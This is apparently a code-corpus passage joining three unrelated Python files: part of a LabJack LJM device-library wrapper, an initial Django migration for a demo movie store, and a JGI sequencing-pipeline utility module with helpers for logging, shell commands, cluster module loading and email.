    if not isinstance(parameter, str):
        raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
    # Pre-allocated, NUL-filled buffer the library writes into.
    outBuf = ("\0" * constants.MAX_NAME_SIZE).encode("ascii")
    err = _staticLib.LJM_ReadLibraryConfigStringS(parameter.encode("ascii"), outBuf)
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return _decodeASCII(outBuf)
def loadConfigurationFile(fileName):
    """Reads a file in as the new LJM configurations.

    Args:
        fileName: A file name string using relative or absolute path.
            "default" maps to the default configuration file
            ljm_startup_config.json in the constants file location.

    Raises:
        TypeError: fileName is not a string.
        LJMError: An error was returned from the LJM library call.
    """
    if not isinstance(fileName, str):
        raise TypeError("Expected a string instead of " + str(type(fileName)) + ".")
    err = _staticLib.LJM_LoadConfigurationFile(fileName.encode("ascii"))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def getSpecificIPsInfo():
    """Get information about whether the specific IPs file was parsed
    successfully.

    Returns:
        A (infoHandle, info) tuple.
        infoHandle: A handle to info that should be passed to cleanInfo
            after info has been read.
        info: A JSON string (allocated by LJM) describing the state of
            the specific IPs, with keys "errorCode", "IPs", "message",
            "filePath" and "invalidIPs".

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    infoHandle = ctypes.c_int32(0)
    infoJson = ctypes.c_char_p()
    err = _staticLib.LJM_GetSpecificIPsInfo(ctypes.byref(infoHandle), ctypes.byref(infoJson))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return infoHandle.value, _decodeASCII(infoJson.value)
def getDeepSearchInfo():
    """Get information about whether the Deep Search file was parsed
    successfully.

    Returns:
        A (infoHandle, info) tuple.
        infoHandle: A handle to info that should be passed to cleanInfo
            after info has been read.
        info: A JSON string (allocated by LJM) describing the state of
            the Deep Search IPs, with keys "errorCode", "IPs",
            "message", "filePath" and "invalidIPs".

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    infoHandle = ctypes.c_int32(0)
    infoJson = ctypes.c_char_p()
    err = _staticLib.LJM_GetDeepSearchInfo(ctypes.byref(infoHandle), ctypes.byref(infoJson))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return infoHandle.value, _decodeASCII(infoJson.value)
def log(level, string):
    """Sends a message of the specified level to the LJM debug logger.

    Args:
        level: The level to output the message at. See
            labjack.ljm.constants.DEBUG_LOG_LEVEL.
        string: The debug message to be written to the log file.

    Raises:
        TypeError: string parameter is not a string.
        LJMError: An error was returned from the LJM library call.

    Note: By default, DEBUG_LOG_MODE is to never log, so LJM does not
    output any log messages, even from this function.
    """
    # Keep the original evaluation order: level conversion first, then
    # the string type check.
    cLevel = ctypes.c_int32(level)
    if not isinstance(string, str):
        raise TypeError("Expected a string instead of " + str(type(string)) + ".")
    err = _staticLib.LJM_Log(cLevel, string.encode("ascii"))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def resetLog():
    """Clears all characters from the debug log file.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    err = _staticLib.LJM_ResetLog()
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def registerDeviceReconnectCallback(handle, callback):
    """Sets a callback that LJM calls after the device was found to be
    disconnected (resulting in a read/write error) and then reconnected.

    Args:
        handle: A valid handle to an open device.
        callback: The callback function which will receive the device
            handle as a parameter. Pass 0 or None to disable the
            previously registered callback.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note: registerDeviceReconnectCallback may not be called from within
    a callback.
    """
    if callback is None or callback == 0:
        # Disable any previously registered callback.
        cbLjm = 0
    else:
        # Keep the wrapper object alive for the lifetime of the handle.
        data = _ReconnectCallbackData(handle, callback)
        _g_reconnectCallbackData[handle] = data
        cbLjm = data.callbackLjm
    err = _staticLib.LJM_RegisterDeviceReconnectCallback(handle, cbLjm)
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def _coerceToByteArrayIfString(aBytes):
    """Return aBytes as an ASCII bytearray when it is a str; otherwise
    return it unchanged."""
    return bytearray(aBytes, 'ascii') if isinstance(aBytes, str) else aBytes
def _convertListToCtypeArray(li, cType):
    """Return a ctypes array of cType initialized from the list li."""
    arrayType = cType * len(li)
    return arrayType(*li)
def _convertCtypeArrayToList(listCtype):
    """Return the contents of a ctypes array as a plain Python list."""
    return list(listCtype)
def _decodeASCII(string):
    """Return an ASCII decoded version of the null terminated string.
    Non-ASCII characters are ignored; everything after the first NUL is
    dropped."""
    decoded = string.decode("ascii", "ignore")
    return str(decoded.split("\0", 1)[0])
| 2.046875 | 2 |
demo/store/migrations/0001_initial.py | ikcam/django-boilerplate | 5 | 12765077 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-17 21:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the demo "store" app.

    Creates the Actor, Cast, Contact and Movie models, then adds the
    Cast.movie foreign key once Movie exists.
    """
    # First migration for this app; depends on nothing.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Actor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=100)),
                ('last_name', models.CharField(max_length=100)),
                ('image', models.ImageField(blank=True, null=True, upload_to='actor/')),
            ],
            options={
                'ordering': ['last_name', 'first_name'],
                'verbose_name': 'Actor',
                'verbose_name_plural': 'Actors',
            },
        ),
        migrations.CreateModel(
            name='Cast',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
                ('description', models.TextField(blank=True)),
                ('image', models.ImageField(blank=True, null=True, upload_to='casts/')),
                ('actor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Actor')),
            ],
            options={
                'ordering': ['name'],
                'verbose_name': 'Cast',
                'verbose_name_plural': 'Casts',
            },
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('phone', models.CharField(max_length=30)),
                ('email', models.EmailField(max_length=254)),
                ('address', models.TextField(blank=True)),
                ('actor', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='contact_information', to='store.Actor')),
            ],
        ),
        migrations.CreateModel(
            name='Movie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
                ('year', models.PositiveIntegerField()),
                ('description', models.TextField()),
                ('image', models.ImageField(blank=True, null=True, upload_to='movies/')),
            ],
            options={
                'ordering': ['-year', 'name'],
                'verbose_name': 'Movie',
                'verbose_name_plural': 'Movies',
            },
        ),
        # Added separately because Movie is created after Cast.
        migrations.AddField(
            model_name='cast',
            name='movie',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Movie'),
        ),
    ]
| 1.734375 | 2 |
pytools/lib/common.py | virtualparadox/bbmap | 134 | 12765078 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Function definitions common to all programs.
"""
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## libraries to use
#import re
import os
import time
import sys
#import getpass
import logging
#from colorlog import ColoredFormatter
# import EnvironmentModules # get_read_count_fastq
from subprocess import Popen, PIPE
from email.mime.text import MIMEText
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## function definitions
'''
creates a logging instance
https://docs.python.org/2/howto/logging.html
https://pypi.python.org/pypi/colorlog
'''
def get_logger(log_name, log_file, log_level = "INFO", stdout = False, color = False):
    """Create and return a configured logging instance.

    Args:
        log_name: name registered with the logging module
        log_file: file to append records to (ignored when stdout=True)
        log_level: level name or number, e.g. "INFO"
        stdout: when True, log to sys.stdout instead of log_file
        color: unused; colorlog support was deliberately disabled
            ("Not working in conda - 2017-04-29"), the dead branch
            guarded by "1==2" has been removed

    Returns:
        logging.Logger with one handler attached.
    """
    log = logging.getLogger(log_name)
    if stdout:
        handler = logging.StreamHandler(sys.stdout)
    else:
        handler = logging.FileHandler(log_file)
    formatter = logging.Formatter('%(filename)-15s:%(process)d %(asctime)s %(levelname)s: %(message)s')
    handler.setFormatter(formatter)
    log.addHandler(handler)
    log.setLevel(log_level)
    return log
'''
Checkpoint the status plus a timestamp
- appends the status
@param status_log: /path/to/status.log (or whatever you name it)
@param status: status to append to status.log
'''
def checkpoint_step(status_log, status):
    """Append a "<status>,<timestamp>" checkpoint line to status_log."""
    stamp = time.strftime("%Y-%m-%d %H:%M:%S")
    with open(status_log, "a") as handle:
        handle.write("%s,%s\n" % (status, stamp))
'''
returns the last step (status) from the pipeline
@param status_log: /path/to/status.log (or whatever you name it)
@param log: logger object
@return last status in the status log, "start" if nothing there
'''
def get_status(status_log, log = None):
    """Return the last checkpointed status from status_log.

    Comment lines (starting with '#') are skipped; when the file does
    not exist or the last status is empty, "start" is returned. The
    result is stripped and lower-cased.
    """
    status = "start"
    timestamp = str(time.strftime("%Y-%m-%d %H:%M:%S"))
    if os.path.isfile(status_log):
        with open(status_log, 'r') as handle:
            lines = handle.readlines()
        for line in lines:
            if line.startswith('#'):
                continue
            fields = line.split(",")
            assert len(fields) == 2
            status = str(fields[0]).strip()
            timestamp = str(fields[1]).strip()
        if not status:
            status = "start"
        if log:
            log.info("Last checkpointed step: %s (%s)", status, timestamp)
    elif log:
        log.info("Cannot find status.log (%s), assuming new run", status_log)
    return status.strip().lower()
'''
run a command from python
@param cmd: command to run
@param live: False = run in dry mode (print command), True = run normally
@param log: logger object
@return std_out, std_err, exit_code
'''
def run_command(cmd, live=False, log=None):
    """Run cmd in a shell and return (std_out, std_err, exit_code).

    When live is False the command is only echoed (dry run, exit code
    0). An empty/None cmd yields (None, None, -1).
    """
    if not cmd:
        if log:
            log.error("- No command to run.")
        return None, None, -1
    if not live:
        return "Not live: cmd = '%s'" % (cmd), None, 0
    if log:
        log.info("cmd: %s" % (cmd))
    proc = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
    std_out, std_err = proc.communicate()
    exit_code = proc.returncode
    if log:
        log.info("Return values: exitCode=" + str(exit_code) + ", stdOut=" + str(std_out) + ", stdErr=" + str(std_err))
        if exit_code != 0:
            log.warn("- The exit code has non-zero value.")
    return std_out, std_err, exit_code
'''
replacement for run_command
- includes logging, convert_cmd & post_mortem
'''
def run_cmd(cmd, log=None):
    """Replacement for run_command with logging, convert_cmd and
    post_mortem_cmd built in; returns (std_out, std_err, exit_code)."""
    std_out = None
    std_err = None
    exit_code = 0
    if cmd:
        # Translate "#module;" placeholders for genepool/denovo first.
        cmd = convert_cmd(cmd)
        if log:
            log.info("- cmd: %s", cmd)
        proc = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
        std_out, std_err = proc.communicate()
        exit_code = proc.returncode
        post_mortem_cmd(cmd, exit_code, std_out, std_err, log)
    return std_out, std_err, exit_code
'''
Simple function to output to the log what happened only if exit code > 0
Typical usage:
std_out, std_err, exit_code = run_command(cmd, True)
post_mortem_cmd(cmd, exit_code, std_out, std_err)
'''
def post_mortem_cmd(cmd, exit_code, std_out, std_err, log = None):
    """Report failure details for a command; a no-op unless exit_code > 0.

    Typical usage:
        std_out, std_err, exit_code = run_command(cmd, True)
        post_mortem_cmd(cmd, exit_code, std_out, std_err)
    """
    if exit_code > 0:
        details = [("- cmd failed: %s", cmd), ("- exit code: %s", exit_code)]
        if std_out:
            details.append(("- std_out: %s", std_out))
        if std_err:
            details.append(("- std_err: %s", std_err))
        for fmt, val in details:
            if log:
                log.error(fmt, val)
            else:
                print(fmt % (val,))
'''
Convert command to use genepool or denovo (shifter) to run
replace #placeholder; with shifter or module load command
#placeholder.v; should specify the version to use
This should be the only place in the pipelines that specifies the images/modules translation
'''
def convert_cmd(cmd):
    """Translate a leading "#tool;" placeholder in cmd into the real
    invocation for the current cluster.

    On denovo/cori the placeholder becomes a shifter image invocation;
    on any other host (genepool) it becomes a "module load" prefix.
    Exits with code 18 if the placeholder cannot be resolved.
    """
    new_cmd = cmd
    # Placeholder -> shifter invocation, used on denovo/cori.
    shifter_img = {
        "#bbtools" : "shifter --image=bryce911/bbtools ",
        "#pigz" : "module load pigz;",
        "#jamo" : "shifter --image=registry.services.nersc.gov/htandra/jamo_dev:1.0 ", # works, but would like simple module to use - have one on Denovo but not Cori
        "#gnuplot" : "shifter --image=bryce911/bbtools ", # (1)
        "#spades/3.9.0" : "shifter --image=bryce911/spades3.9.0 ",
        "#spades/3.10.1" : "shifter --image=bryce911/spades3.10.1 ",
        "#spades/3.11.0" : "shifter --image=bryce911/spades-3.11.0 ", # GAA-3383
        "#spades/3.11.1-check" : "shifter --image=bryce911/spades3.11.1-check ", # development
        "#prodigal/2.6.3" : "shifter --image=registry.services.nersc.gov/jgi/prodigal ", # RQCSUPPORT-1318
        "#prodigal/2.5.0" : "shifter --image=registry.services.nersc.gov/jgi/prodigal ",
        "#prodigal/2.50" : "shifter --image=registry.services.nersc.gov/jgi/prodigal ",
        "#lastal/869" : "shifter --image=bryce911/lastal:869 ",
        "#lastal/828" : "shifter --image=bryce911/lastal:869 ",
        #"#lastal" : "shifter --image=bryce911/lastal:869 ",
        "#R/3.3.2" : "module load R/3.3.2;",
        "#texlive" : "shifter --image=bryce911/bbtools ", # (1)
        "#java" : "shifter --image=bryce911/bbtools ", # (1)
        "#blast+/2.6.0" : "shifter --image=sulsj/ncbi-blastplus:2.6.0 ",
        "#blast" : "shifter --image=sulsj/ncbi-blastplus:2.7.0 ",
        "#megahit-1.1.1" : "shifter --image=foster505/megahit:v1.1.1-2-g02102e1 ",
        "#smrtanalysis/2.3.0_p5" : "shifter --image=registry.services.nersc.gov/jgi/smrtanalysis:2.3.0_p5 ", # meth - need more memory
        "#mummer/3.23" : "shifter --image=bryce911/mummer3.23 ", # 3.23
        "#hmmer" : "shifter --image=registry.services.nersc.gov/jgi/hmmer:latest ", # 3.1b2
        "#samtools/1.4" : "shifter --image=rmonti/samtools ",
        "#mothur/1.39.5" : "shifter --image=bryce911/mothur1.39.5 ",
        "#vsearch/2.4.3" : "shifter --image=bryce911/vsearch2.4.3 ",
        "#graphviz" : "shifter --image=bryce911/bbtools ",
        "#ssu-align/0.1.1" : "shifter --image=bryce911/ssu-align0.1.1 ", # openmpi/1.10 included in docker container
        "#smrtlink/4.0.0.190159" : "shifter --image=registry.services.nersc.gov/jgi/smrtlink:4.0.0.190159 /smrtlink/smrtcmds/bin/", # progs not in path
        "#smrtlink/5.0.1.9585" : "shifter --image=registry.services.nersc.gov/jgi/smrtlink:5.0.1.9585 /smrtlink/smrtcmds/bin/", # progs not in path, Tony created 2017-10-16
        "#smrtlink" : "shifter --image=registry.services.nersc.gov/jgi/smrtlink:5.0.1.9585 /smrtlink/smrtcmds/bin/", # progs not in path
        "#prodege" : "shifter --image=bryce911/prodege ", # 2.2.1
        #"#hmmer" : "shifter --image=registry.services.nersc.gov/jgi/hmmer ", # 3.1b2 - Feb 2015, latest as of Oct 2017
        "#checkm" : "shifter --image=registry.services.nersc.gov/jgi/checkm ",
    }
    # (1) - added as part of the bryce911 bbtools package
    #cmd = "#bbtools-shijie;bbmap...."
    # this dict will be deprecated as of March 2018 when genepool passes into legend
    # Placeholder -> "module load" prefix, used on genepool.
    genepool_mod = {
        "#bbtools" : "module load bbtools",
        "#pigz" : "module load pigz",
        "#jamo" : "module load jamo",
        "#gnuplot" : "module load gnuplot/4.6.2", # sag,iso,sps,ce:gc_cov, gc_histogram, contig_gc
        "#spades/3.9.0" : "module load spades/3.9.0",
        "#spades/3.10.1" : "module load spades/3.10.1",
        "#spades/3.11.1" : "module load spades/3.11.1-check",
        "#prodigal/2.6.3" : "module load prodigal/2.50", # aka 2.50, also 2.60 is available
        "#prodigal/2.5.0" : "module load prodigal/2.50",
        "#prodigal/2.50" : "module load prodigal/2.50",
        #"#lastal" : "module load last/828",
        "#lastal/828" : "module load last/828",
        "#R/3.3.2" : "module unload R;module load R/3.3.1", # 3.3.2 not on genepool - RQCSUPPORT-1516 unload R for Kecia
        "#texlive" : "module load texlive",
        "#blast+/2.6.0" : "module load blast+/2.6.0",
        #"#blast+/2.7.0" : "module load blast+/2.7.0", # not created
        "#blast" : "module load blast+/2.6.0",
        "#java" : "", # java runs natively on genepool
        "#megahit-1.1.1" : "module load megahit/1.1.1",
        "#smrtanalysis/2.3.0_p5" : "module load smrtanalysis/2.3.0_p5",
        "#smrtanalysis/2.3.0_p5_xmx32g" : "module load smrtanalysis/2.3.0_p5;export _JAVA_OPTIONS='-Xmx32g'",
        "#mummer/3.23" : "module load mummer/3.23",
        "#hmmer" : "module load hmmer/3.1b2",
        "#samtools/1.4" : "module load samtools/1.4",
        "#mothur/1.39.5" : "module load mothur/1.32.1", # 1.26.0 default, 1.32.1
        "#vsearch/2.4.3" : "module load vsearch/2.3.0", # 2.3.0
        "#graphviz" : "module load graphviz",
        "#ssu-align/0.1.1" : "module load ssu-align",
        "#smrtlink/4.0.0.190159" : "module load smrtlink/4.0.0.190159",
        "#smrtlink" : "module load smrtlink/5.0.1.9585",
        "#smrtlink/5.0.1.9585" : "module load smrtlink/5.0.1.9585",
        "#prodege" : "module load R;/projectb/sandbox/rqc/prod/pipelines/external_tools/sag_decontam/prodege-2.2/bin/",
        "#checkm" : "module load hmmer prodigal pplacer", # checkm installed in python by default on genepool
    }
    #bbtools;stats.sh
    if cmd.startswith("#"):
        cluster = "genepool"
        # any other env ids to use?
        # cori, denovo, genepool
        cluster = os.environ.get('NERSC_HOST', 'unknown')
        f = cmd.find(";")
        mod = "" # command to replace
        if f > -1:
            mod = cmd[0:f]
        if mod:
            # use module load jamo on denovo
            if mod == "#jamo" and cluster == "denovo":
                shifter_img[mod] = "module load jamo;"
            if cluster in ("denovo", "cori"):
                if mod in shifter_img:
                    new_cmd = new_cmd.replace(mod + ";", shifter_img[mod])
            else:
                if mod in genepool_mod:
                    if genepool_mod[mod] == "":
                        new_cmd = new_cmd.replace(mod + ";", "")
                    else:
                        new_cmd = new_cmd.replace(mod, genepool_mod[mod])
    # Unresolved placeholder: fail hard so callers notice immediately.
    if new_cmd.startswith("#"):
        print "Command not found! %s" % new_cmd
        sys.exit(18)
    #print new_cmd
    return new_cmd
'''
returns human readable file size
@param num = file size (e.g. 1000)
@return: readable float e.g. 1.5 KB
'''
def human_size(num):
    """Return num bytes as a human readable string, e.g. 1500 -> "1.5 KB".

    A falsy num (None, 0) is treated as 0 bytes.
    """
    size = float(num) if num else 0.0
    for unit in ('bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'XB'):
        if size < 1024.0:
            return "%3.1f %s" % (size, unit)
        size /= 1024.0
    return "%3.1f %s" % (size, 'ZB')
'''
send out email
@param emailTo: email receipient (e.g. <EMAIL>)
@param emailSubject: subject line for the email
@param emailBody: content of the email
@param emailFrom: optional email from
'''
def send_email(email_to, email_subject, email_body, email_from = '<EMAIL>', log = None):
    """Send an HTML email via the local sendmail binary.

    Args:
        email_to: email recipient (required)
        email_subject: subject line (required)
        email_body: content of the email, sent as HTML (required)
        email_from: optional sender address
        log: optional logger; messages fall back to print()

    Returns:
        1 when a required parameter is missing (no mail is sent),
        0 otherwise.
    """
    msg = ""
    err_flag = 0
    # Bug fix: the original set msg on validation failures but never set
    # err_flag, so sendmail was invoked even with missing parameters and
    # the early-return branch below was unreachable.
    if not email_to:
        msg = "- send_email: email_to parameter missing!"
        err_flag = 1
    if not email_subject:
        msg = "- send_email: email_subject parameter missing!"
        err_flag = 1
    if not email_body:
        msg = "- send_email: email_body parameter missing!"
        err_flag = 1
    if err_flag == 0:
        msg = "- sending email to: %s" % (email_to)
    if log:
        log.info(msg)
    else:
        print(msg)
    if err_flag == 1:
        return err_flag
    # assume html
    email_msg = MIMEText(email_body, "html")  # vs "plain"
    email_msg['Subject'] = email_subject
    email_msg['From'] = email_from
    email_msg['To'] = email_to
    p = Popen(["/usr/sbin/sendmail", "-t"], stdin = PIPE)
    p.communicate(email_msg.as_string())
    return err_flag
'''
Write to rqc_file (e.g. rqc-files.tmp) the file_key and file_value
@param rqc_file_log: full path to file containing key=file
@param file_key: key for the entry
@param file_value: value for the entry
'''
def append_rqc_file(rqc_file_log, file_key, file_value, log=None):
    """Append "file_key = file_value" to the rqc files log.

    Args:
        rqc_file_log: full path to the file containing key = file lines
        file_key: key for the entry; nothing is written when falsy
        file_value: value for the entry
        log: optional logger
    """
    if file_key:
        # Renamed from "buffer", which shadowed a Python builtin.
        entry = "%s = %s\n" % (file_key, file_value)
        with open(rqc_file_log, "a") as myfile:
            myfile.write(entry)
        if log: log.info("append_rqc_file: %s:%s" % (file_key, file_value))
    else:
        if log: log.warning("key or value error: %s:%s" % (file_key, file_value))
'''
Write to rqc_stats (e.g. rqc-stats.tmp) the stats_key and stats_value
@param rqc_file_log: full path to file containing key=file
@param file_key: key for the entry
@param file_value: value for the entry
'''
def append_rqc_stats(rqc_stats_log, stats_key, stats_value, log=None):
    """Append "stats_key = stats_value" to the rqc stats log.

    Args:
        rqc_stats_log: full path to the file containing key = value lines
        stats_key: key for the entry; nothing is written when falsy
        stats_value: value for the entry
        log: optional logger
    """
    if stats_key:
        # Renamed from "buffer", which shadowed a Python builtin.
        entry = "%s = %s\n" % (stats_key, stats_value)
        with open(rqc_stats_log, "a") as myfile:
            myfile.write(entry)
        if log: log.info("append_rqc_stats: %s:%s" % (stats_key, stats_value))
    else:
        if log: log.warning("key or value error: %s:%s" % (stats_key, stats_value))
'''
Return the file system path to jgi-rqc-pipeline so we can use */tools and */lib
@return /path/to/jgi-rqc-pipelines
'''
def get_run_path():
    """Return the absolute path of the parent of this module's directory
    (i.e. /path/to/jgi-rqc-pipeline), so */tools and */lib can be used."""
    here = os.path.dirname(os.path.abspath(__file__))
    return os.path.abspath(os.path.join(here, os.pardir))
'''
Simple read count using bbtools n_contigs field
- slightly different than in rqc_utility
n_scaffolds n_contigs scaf_bp contig_bp gap_pct scaf_N50 scaf_L50 ctg_N50 ctg_L50 scaf_N90 scaf_L90 ctg_N90 ctg_L90 scaf_max ctg_max scaf_n_gt50K scaf_pct_gt50K gc_avg gc_std
1346616 1346616 405331416 405331415 0.000 1346616 301 1346615 301 1346616 301 1346615 301 301 301 0 0.000 0.44824 0.02675
'''
def get_read_count_fastq(fastq, log = None):
    """Return the read count of a fastq file using bbtools stats.sh
    (n_contigs field); 0 when the file is missing or the command fails."""
    read_cnt = 0
    if not os.path.isfile(fastq):
        if log:
            log.error("- fastq: %s does not exist!", fastq)
        return read_cnt
    # bbtools is faster than zcat | wc because bbtools uses pigz
    cmd = convert_cmd("#bbtools;stats.sh format=3 in=%s" % fastq)
    if log:
        log.info("- cmd: %s", cmd)
    std_out, std_err, exit_code = run_command(cmd, True)
    if exit_code == 0 and std_out:
        # Line 0 is the header, line 1 the values; field 1 is n_contigs.
        fields = str(std_out.split("\n")[1]).split()
        read_cnt = int(fields[1])
        if log:
            log.info("- read count: %s", read_cnt)
    elif log:
        post_mortem_cmd(cmd, exit_code, std_out, std_err, log)
    return read_cnt
'''
Subsampling calculation
0 .. 250k reads = 100%
250k .. 25m = 100% to 1%
25m .. 600m = 1%
600m+ .. oo < 1%
July 2014 - 15 runs > 600m (HiSeq-2500 Rapid) - 4 actual libraries / 85325 seq units
- returns new subsampling rate
'''
def get_subsample_rate(read_count):
    """Return the subsampling fraction for a given read count.

    0..250k reads -> 100%; 250k..25m -> 100% down to 1%; 25m..600m -> 1%;
    beyond that the rate is capped so at most ~6m reads (about 4 hours of
    blast time) are sampled.
    """
    max_subsample = 6000000  # 4 hours of blast time
    rate = max(250000.0 / read_count, 0.01)
    rate = min(1, rate)
    if int(read_count * rate) > max_subsample:
        rate = max_subsample / float(read_count)
    return rate
'''
Set color hash
- need to update to remove "c" parameter - used in too many places
'''
def set_colors(c, use_color = False):
    """Return a color-name -> ANSI escape dict; all values are empty
    strings when use_color is False.

    The "c" parameter is unused and kept only for call-site
    compatibility (see the note in the original header comment).
    """
    names = ('black', 'red', 'green', 'yellow', 'blue', 'pink', 'cyan', 'white')
    if use_color:
        color = dict((name, "\033[1;3%dm" % idx) for idx, name in enumerate(names))
        color[''] = "\033[m"
    else:
        color = dict((name, "") for name in names)
        color[''] = ""
    return color
'''
New function that just returns colors
'''
def get_colors():
    """Return the ANSI escape code for each supported color name; the
    empty-string key maps to the reset sequence."""
    names = ('black', 'red', 'green', 'yellow', 'blue', 'pink', 'cyan', 'white')
    color = dict((name, "\033[1;3%dm" % idx) for idx, name in enumerate(names))
    color[''] = "\033[m"
    return color
'''
Returns msg_ok, msg_fail, msg_warn colored or not colored
'''
def get_msg_settings(color):
    """Return (msg_ok, msg_fail, msg_warn) strings built from the given
    color map (as produced by get_colors/set_colors)."""
    def badge(word, name):
        return "[ " + color[name] + word + color[''] + " ]"
    return badge("OK", 'green'), badge("FAIL", 'red'), badge("WARN", 'yellow')
'''
Use RQC's ap_tool to get the status
set mode = "-sa" to show all, even completed
'''
def get_analysis_project_id(seq_proj_id, target_analysis_project_id, target_analysis_task_id, output_path, log = None, mode = ""):
    """Look up the RQC analysis project/task ids for a sequencing project
    by running ap_tool.py and parsing its pipe-separated output.

    Set mode = "-sa" to show all, even completed.

    Returns:
        (analysis_project_id, analysis_task_id) as ints; (0, 0) when the
        lookup fails or the ids are below 100 (header fallback values).
    """
    if log:
        log.info("get_analysis_project_id: spid = %s, tapid = %s, tatid = %s", seq_proj_id, target_analysis_project_id, target_analysis_task_id)
    analysis_project_id = 0
    analysis_task_id = 0
    project_type = None
    task_type = None
    ap_list = os.path.join(output_path, "ap-info.txt")
    AP_TOOL = "/global/dna/projectdirs/PI/rqc/prod/jgi-rqc-pipeline/tools/ap_tool.py"
    #AP_TOOL = "/global/homes/b/brycef/git/jgi-rqc-pipeline/tools/ap_tool.py"
    cmd = "%s -spid %s -m psv -tapid %s -tatid %s %s > %s 2>&1" % (AP_TOOL, seq_proj_id, target_analysis_project_id, target_analysis_task_id, mode, ap_list)
    if log:
        log.info("- cmd: %s", cmd)
    else:
        print "- cmd: %s" % cmd
    std_out, std_err, exit_code = run_command(cmd, True)
    post_mortem_cmd(cmd, exit_code, std_out, std_err, log)
    if os.path.isfile(ap_list):
        ap_dict = {} # header = value
        cnt = 0
        fh = open(ap_list, "r")
        for line in fh:
            arr = line.strip().split("|")
            if cnt == 0:
                # First row: remember each column title's position.
                c2 = 0 # position of title in header
                for a in arr:
                    ap_dict[a.lower()] = c2
                    c2 += 1
            else:
                # Data rows: replace each column index with its value
                # (the last data row wins).
                for a in ap_dict:
                    if ap_dict[a] + 1 > len(arr):
                        pass
                    else:
                        ap_dict[a] = arr[ap_dict[a]]
            cnt += 1
        fh.close()
        analysis_project_id = ap_dict.get("analysis project id")
        analysis_task_id = ap_dict.get("analysis task id")
        project_type = ap_dict.get("analysis product name")
        task_type = ap_dict.get("analysis task name")
        # no such project: header only, no data rows
        if cnt == 1:
            analysis_project_id = 0
            analysis_task_id = 0
        if log:
            log.info("- project type: %s, task type: %s", project_type, task_type)
            log.info("- analysis_project_id: %s, analysis_task_id: %s", analysis_project_id, analysis_task_id)
    try:
        analysis_project_id = int(analysis_project_id)
        analysis_task_id = int(analysis_task_id)
    except:
        analysis_project_id = 0
        analysis_task_id = 0
    # ap = 4, at = 8 means its using the column names but didn't find anything
    if analysis_project_id < 100:
        analysis_project_id = 0
    if analysis_task_id < 100:
        analysis_task_id = 0
    return analysis_project_id, analysis_task_id
'''
For creating a dot file from the pipeline flow
'''
def append_flow(flow_file, orig_node, orig_label, next_node, next_label, link_label):
    """Append one pipe-delimited edge record to the pipeline flow file
    (consumed later by dot_flow)."""
    record = "%s|%s|%s|%s|%s\n" % (orig_node, orig_label, next_node, next_label, link_label)
    with open(flow_file, "a") as handle:
        handle.write(record)
'''
Flow file format:
# comment
*label|PBMID Pipeline run for BTXXY<br><font point-size="10">Run Date: 2017-09-28 14:22:50</font>
# origin node, origin label, next node, next label, link label
input_h5|BTXXY H5<br><font point-size="10">3 smrtcells</font>|assembly|HGAP Assembly<FONT POINT-SIZE="10"><br>3 contigs, 13,283,382bp</FONT>|HGAP v4.0.1
nodes should be the output of the transformation between the nodes
e.g. input fastq (25m reads) --[ bbtools subsampling ]--> subsampled fastq (10m reads)
creates a dot file, to convert to png use:
$ module load graphviz
$ dot -T png (dot file) > (png file)
More info on formatting the labels
http://www.graphviz.org/content/node-shapes#html
'''
def dot_flow(flow_file, dot_file, log = None):
    """Convert a pipe-delimited flow file into a graphviz dot file.

    Returns the dot file path, or None when flow_file does not exist.
    Render with: dot -T png (dot file) > (png file).
    """
    if not os.path.isfile(flow_file):
        if log:
            log.info("- cannot find flow file: %s", flow_file)
        else:
            print "Cannot find flow file: %s" % flow_file
        return
    fhw = open(dot_file, "w")
    fhw.write("// dot file\n")
    fhw.write("digraph rqc {\n") # directed graph
    fhw.write("    node [shape=box];\n")
    fhw.write("    rankdir=LR;\n")
    fh = open(flow_file, "r")
    for line in fh:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            continue
        # graph label
        if line.startswith("*label"):
            arr = line.split("|")
            label = flow_replace(str(arr[1]))
            fhw.write("    label=<%s>;\n" % label)
            fhw.write("    labelloc=top;\n")
        else:
            # edge record: origin node, origin label, next node,
            # next label, link label
            arr = line.split("|")
            #print arr
